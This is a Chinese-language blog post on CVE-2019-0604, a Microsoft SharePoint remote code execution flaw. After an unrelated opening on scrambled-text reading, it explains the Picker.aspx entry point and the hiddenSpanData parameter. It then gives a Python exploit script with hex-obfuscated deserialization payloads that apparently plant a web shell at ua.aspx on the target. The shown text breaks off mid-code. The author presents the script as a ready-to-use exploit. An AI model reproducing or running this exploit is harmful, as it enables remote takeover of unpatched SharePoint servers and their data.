[EXP]CVE-2019-0604微軟SharePoint遠程代碼執行漏洞利用

研表究明，漢字的序順並不定一能影閱響讀，好比當你看完這句話後，才發這現裏的字全是都亂的。

劍橋大學的研究結果，當單詞的字母順序顛倒時，你仍舊能夠明白整個單詞的意思。其中重要的是：只要單詞的第一個字母和最後一個子字母位置正確便可。其餘的能夠是徹底的亂碼，你仍舊能夠清楚的徹底沒有問題的閱讀。緣由是由於人腦在認知單詞的過程當中不是依靠辨識字母的順序，而是從總體來看。
同理，漢字的閱讀也會受到大腦先入爲主的分析。若是你所看到的句子在大腦中事先有過印象，那麼你就能順利的將它讀出。若是句子是大腦以前沒有處理過的，那麼固然就讀不出來拉～

單詞裏面字母亂序不影響閱讀的現象,（中英文適用）學名叫作Typoglycemia，用於描述關於人們閱讀行爲中的認知過程，已經有半個多世紀的研究了。

最近剛高考完不久，因此會在羣裏看到一些人說學信息安全須要英文、數學好才能學得好。詳見Tips

 

漏洞信息

Microsoft SharePoint是美國微軟（Microsoft）公司的一套企業業務協做平臺。該平臺用於對業務信息進行整合，並可以共享工做、與他人協同工做、組織項目和工做組、搜索人員和信息。

Microsoft SharePoint 遠程代碼執行漏洞（CVE-2019-059四、CVE-2019-0604，高危）：Microsoft SharePoint軟件沒法檢查應用程序包源標記時觸發該漏洞。攻擊者可在SharePoint應用程序池和SharePoint服務器中執行任意代碼。

影響版本：

Microsoft SharePoint Enterprise Server 2016

SharePoint Foundation 2013 SP1

harePoint Server 2010 SP2

SharePoint Server 2019。

攻擊入口

ItemPicker Web 控件實際上歷來沒有在一個 .aspx 頁面中使用過。可是看看它基類型的用法，EntityEditorWithPicker，說明在 /_layouts/15/Picker.aspx 應該有一個 Picker.aspx 文件使用了它。

該頁面要求使用選擇器對話框的類型經過 URL 的 PickerDialogType 參數的形式提供。在這裏，可使用如下兩種 ItemPickerDialog 類型中的任何一種：

· Microsoft.SharePoint.WebControls.ItemPickerDialog in Microsoft.SharePoint.dll · Microsoft.SharePoint.Portal.WebControls.ItemPickerDialog in Microsoft.SharePoint.Portal.dll 

利用第一種 PickerDialogType 類型

 

PoC

當表單提交 ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData 的值以 「__」 爲開頭時(相似於「_dummy」)，

EntityInstanceIdEncoder.DecodeEntityInstanceId(string) 處的斷點將顯示如下狀況：而調用另一種 ItemPickerDialog 類型時，函數調用棧只是在最上面的兩個有所不一樣。

這代表 ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData 的數據最終出如今了 EntityInstanceIdEncoder.DecodeEntityInstanceId(string) 中。 剩下的只須要拷貝實例 ID 和構造一個 XmlSerializer 的 payload 就能夠了。

 

補充：

做者說只要構造一個XML序列化的Payload就能夠了，可是Payload提交到哪裏呢？

原文中只說了一半,完整POST以及具體參數以下：

URL： /Picker.aspx?PickerDialogType=控件的程序集限定名 

參數： ctl00%24PlaceHolderDialogBodySection%24ctl05%24hiddenSpanData=payload

實際上還需訪問Picker.aspx附帶的其它參數，測試我不附帶其它參數時提交表單是失敗的。

 

此漏洞分析文章出來時就想搭環境測試了，第一天下載APP安裝後發現下錯了，

加上項目未遇到該程序，搭環境也浪費時間懶得弄，就暫時丟一邊了。

今天發現上週已經弄了一半，又從新研究了一下。

 

詳情請看原文，我想如下文章應該很多人看過了吧，所謂原理不少人都能說得出來

就是都在等一個真正能用的EXP吧，哈哈哈，我就是傳說中的雲黑客「雞你太美」！

原文(英文): https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability

譯文(中文): https://www.anquanke.com/post/id/173476

 

EXP

#cve-2019-0604 SharePoint RCE exploit
#date: 20190618 #author: k8gege
import urllib
import urllib2
import sys
import requests
url0 = sys.argv[1]
url1 = '/_layouts/15/Picker.aspx?PickerDialogType='
url = url0 + url1 
shellurl=url0+'/_layouts/15/ua.aspx'
exp='\x63\x76\x65\x2D\x32\x30\x31\x39\x2D\x30\x36\x30\x34\x20\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x20\x52\x43\x45\x20\x65\x78\x70\x6C\x6F\x69\x74'
paySpanData='\x63\x74\x6C\x30\x30\x24\x50\x6C\x61\x63\x65\x48\x6F\x6C\x64\x65\x72\x44\x69\x61\x6C\x6F\x67\x42\x6F\x64\x79\x53\x65\x63\x74\x69\x6F\x6E\x24\x63\x74\x6C\x30\x35\x24\x68\x69\x64\x64\x65\x6E\x53\x70\x61\x6E\x44\x61\x74\x61';
paySection='\x50\x6C\x61\x63\x65\x48\x6F\x6C\x64\x65\x72\x44\x69\x61\x6C\x6F\x67\x42\x6F\x64\x79\x53\x65\x63\x74\x69\x6F\x6E'
ct1='\x63\x74\x6C\x30\x30\x24'
ct2='\x24\x63\x74\x6C\x30\x35'
spver = '\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x2E\x57\x65\x62\x43\x6F\x6E\x74\x72\x6F\x6C\x73\x2E\x49\x74\x65\x6D\x50\x69\x63\x6B\x65\x72\x44\x69\x61\x6C\x6F\x67\x2C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x53\x68\x61\x72\x65\x50\x6F\x69\x6E\x74\x2C\x56\x65\x72\x73\x69\x6F\x6E\x3D\x31\x35\x2E\x30\x2E\x30\x2E\x30\x2C\x43\x75\x6C\x74\x75\x72\x65\x3D\x6E\x65\x75\x74\x72\x61\x6C\x2C\x50\x75\x62\x6C\x69\x63\x4B\x65\x79\x54\x6F\x6B\x65\x6E\x3D\x37\x31\x65\x39\x62\x63\x65\x31\x31\x31\x65\x39\x34\x32\x39\x63'
uapay='\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74'
payload1='\x5F\x5F\x62\x70\x38\x32\x63\x31\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x32\x30\x30\x33\x35\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x65\x36\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x65\x32\x30\x30\x35\x34\x30\x30\x38\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x37\x35\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x30\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x36\x30\x30\x32\x33\x30\x30\x62\x35\x30\x30\x62\x35\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x37\x35\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x66\x36\x30\x30\x37\x37\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x64\x34\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x62\x36\x30\x30\x35\x37\x30\x30\x30\x37\x30\x30\x65\x32\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x36\x34\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x37\x37\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x62\x36\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x36\x35\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x34\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x33\x34\x30\x30\x35\x37\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x35\x37\x30\x30\x32\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x65\x36\x30\x30\x35\x36\x30\x30\x35\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x35\x37\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x62\x34\x30\x30\x35\x36\x30\x30\x39\x37\x30\x30\x34\x35\x30\x30\x66\x36\x30\x30\x62\x36\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x33\x33\x30\x30\x31\x33\x30\x30\x32\x36\x30\x30\x36\x36\x30\x30\x33\x33\x30\x30\x38\x33\x30\x30\x35\x33\x30\x30\x36\x33\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x33\x33\x30\x30\x36\x33\x30\x30\x34\x33\x30\x30\x35\x36\x30\x30\x33\x33\x30\x30\x35\x33\x30\x30\x64\x35\x30\x30\x63\x32\x30\x30\x62\x35\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x37\x35\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x66\x36\x30\x30\x37\x37\x30\x30\x33\x37\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x32\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30'
payload2='\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x30\x32\x30\x30\x36\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x66\x36\x30\x30\x65\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x31\x33\x30\x30\x65\x32\x30\x30\x30\x33\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x35\x37\x30\x30\x34\x37\x30\x30\x36\x36\x30\x30\x64\x32\x30\x30\x31\x33\x30\x30\x36\x33\x30\x30\x32\x32\x30\x30\x66\x33\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x63\x33\x30\x30\x35\x34\x30\x30\x38\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x37\x35\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x30\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x66\x34\x30\x30\x36\x36\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x36\x30\x30\x34\x37\x30\x30\x34\x37\x30\x30\x30\x37\x30\x30\x61\x33\x30\x30\x66\x32\x30\x30\x66\x32\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x65\x32\x30\x30\x37\x37\x30\x30\x33\x33\x30\x30\x65\x32\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x37\x36\x30\x30\x66\x32\x30\x30\x32\x33\x30\x30\x30\x33\x30\x30\x30\x33\x30\x30\x31\x33\x30\x30\x66\x32\x30\x30\x38\x35\x30\x30\x64\x34\x30\x30\x63\x34\x30\x30\x33\x35\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x31\x36\x30\x30\x64\x32\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x34\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x36\x30\x30\x34\x37\x30\x30\x34\x37\x30\x30\x30\x37\x30\x30\x61\x33\x30\x30\x66\x32\x30\x30\x66\x32\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x37\x37\x30\x30\x65\x32\x30\x30\x37\x37\x30\x30\x33\x33\x30\x30\x65\x32\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x37\x36\x30\x30\x66\x32\x30\x30\x32\x33\x30\x30\x30\x33\x30\x30\x30\x33\x30\x30\x31\x33\x30\x30\x66\x32\x30\x30\x38\x35\x30\x30\x64\x34\x30\x30\x63\x34\x30\x30\x33\x35\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x31\x36\x30\x30\x32\x32\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x34\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x34\x37\x30\x30\x39\x37\x30\x30\x30\x33\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x33\x37\x30\x30\x39\x36\x30\x30\x61\x33\x30\x30\x34\x37\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x38\x35\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x66\x32\x30\x30\x65\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x30\x32\x30\x30\x63\x33\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x65\x34\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x65\x33\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30'
payload3='\x61\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x62\x33\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x37\x30\x30\x64\x33\x30\x30\x64\x36\x30\x30\x33\x37\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x32\x37\x30\x30\x63\x36\x30\x30\x39\x36\x30\x30\x32\x36\x30\x30\x32\x32\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x38\x37\x30\x30\x64\x36\x30\x30\x63\x36\x30\x30\x65\x36\x30\x30\x33\x37\x30\x30\x61\x33\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x33\x36\x30\x30\x63\x36\x30\x30\x32\x37\x30\x30\x64\x32\x30\x30\x65\x36\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x30\x37\x30\x30\x31\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x65\x32\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x65\x36\x30\x30\x66\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x39\x36\x30\x30\x33\x36\x30\x30\x33\x37\x30\x30\x62\x33\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x36\x30\x30\x63\x36\x30\x30\x39\x37\x30\x30\x64\x33\x30\x30\x33\x37\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x32\x32\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x38\x37\x30\x30\x61\x33\x30\x30\x62\x34\x30\x30\x35\x36\x30\x30\x39\x37\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x63\x34\x30\x30\x31\x36\x30\x30\x35\x37\x30\x30\x65\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x33\x34\x30\x30\x31\x36\x30\x30\x63\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x35\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x62\x37\x30\x30\x38\x37\x30\x30\x61\x33\x30\x30\x34\x35\x30\x30\x39\x37\x30\x30\x30\x37\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x34\x34\x30\x30\x39\x36\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x61\x33\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x33\x36\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x33\x37\x30\x30\x64\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x65\x34\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x34\x37\x30\x30\x32\x32\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x34\x30\x30\x32\x36\x30\x30\x61\x36\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x34\x37\x30\x30\x34\x34\x30\x30\x31\x36\x30\x30\x34\x37\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x32\x37\x30\x30\x66\x36\x30\x30\x36\x37\x30\x30\x39\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x64\x34\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x35\x36\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x33\x37\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x36\x30\x30\x64\x36\x30\x30\x34\x36\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x32\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x64\x30\x30\x30\x61\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x39\x30\x30\x30\x36\x32\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x33\x35\x30\x30\x39\x37\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x35\x36\x30\x30\x64\x36\x30\x30\x61\x33\x30\x30\x33\x35\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x66\x32\x30\x30\x33\x36\x30\x30\x30\x32\x30\x30\x35\x36\x30\x30\x33\x36\x30\x30\x38\x36\x30\x30\x66\x36\x30\x30\x30\x32\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x30\x37\x30\x30\x62\x33\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x35\x32\x30\x30\x30\x34\x30\x30\x30\x32\x30\x30\x30\x35\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x30\x32\x30\x30\x63\x34\x30\x30\x31\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x61\x34\x30\x30\x33\x37\x30\x30\x33\x36\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x30\x37\x30\x30\x34\x37\x30\x30\x32\x32\x30\x30\x30\x32\x30\x30\x35\x32\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x37\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x65\x35\x30\x30\x36\x32\x30\x30\x31\x36\x30\x30\x64\x36\x30\x30\x30\x37\x30\x30\x62\x33\x30\x30\x63\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x35\x32\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x30\x37\x30\x30\x37\x37\x30\x30\x34\x36\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x34\x37\x30\x30\x66\x36\x30\x30\x64\x36\x30\x30\x32\x32\x30\x30\x62\x33\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x64\x33\x30\x30\x32\x35\x30\x30\x35\x36\x30\x30\x31\x37\x30\x30\x35\x37\x30\x30\x35\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x65\x32\x30\x30\x35\x35\x30\x30\x33\x37\x30\x30\x35\x36\x30\x30\x32\x37\x30\x30\x31\x34\x30\x30\x37\x36\x30\x30\x35\x36\x30\x30\x65\x36\x30\x30\x34\x37\x30\x30\x62\x33\x30\x30\x39\x36\x30\x30\x36\x36\x30\x30\x30\x32\x30\x30\x38\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x33\x35\x30\x30\x35\x37\x30\x30\x32\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x39\x36\x30\x30\x65\x36\x30\x30\x37\x36\x30\x30\x38\x32\x30\x30\x30\x33\x30\x30\x63\x32\x30\x30\x30\x32\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30\x30\x65\x32\x30\x30\x39\x34\x30\x30\x65\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x38\x37\x30\x30\x66\x34\x30\x30\x36\x36\x30\x30\x38\x32\x30\x30\x32\x32\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x32\x32\x30\x30\x39\x32\x30\x30\x39\x32\x30\x30\x64\x33\x30\x30\x64\x33\x30\x30\x30\x32\x30\x30\x30\x37\x30\x30\x37\x37\x30\x30\x34\x36\x30\x30\x39\x32\x30\x30\x30\x32\x30\x30\x62\x37\x30\x30\x36\x37\x30\x30\x31\x36\x30\x30\x32\x37\x30\x30\x30\x32\x30\x30\x33\x36\x30\x30\x66\x36\x30\x30\x34\x36\x30\x30\x35\x36\x30\x30\x64\x33\x30\x30\x35\x37\x30\x30\x31\x36\x30\x30\x33\x37\x30\x30\x34\x37\x30\x30\x32\x37\x30'
payload4='\x74\x6F\x6D\x3D\x3D\x3D\x52\x65\x73\x70\x6F\x6E\x73\x65\x2E\x57\x72\x69\x74\x65\x28\x22\x55\x41\x73\x68\x65\x6C\x6C\x22\x29\x3B'
payload5='\x23\x64\x61\x74\x65\x3A\x20\x32\x30\x31\x39\x30\x36\x32\x36\x20\x23\x61\x75\x74\x68\x6F\x72\x3A\x20\x6B\x38\x67\x65\x67\x65'

values = {'__REQUESTDIGEST':'0xF4545A48FA093FD290D386F2E317C72EF439C05EABDC8BDF0D81022DAEFE10FF6D4782A17836870BB0EBF673E71DCD6F7E631A1371319881902FDEF3032A16F4,18 Jun 2019 16:41:35 -0000',
'__EVENTTARGET':'',
'__EVENTARGUMENT':'',
'__spPickerHasReturnValue':'',
'__spPickerReturnValueHolder':'',
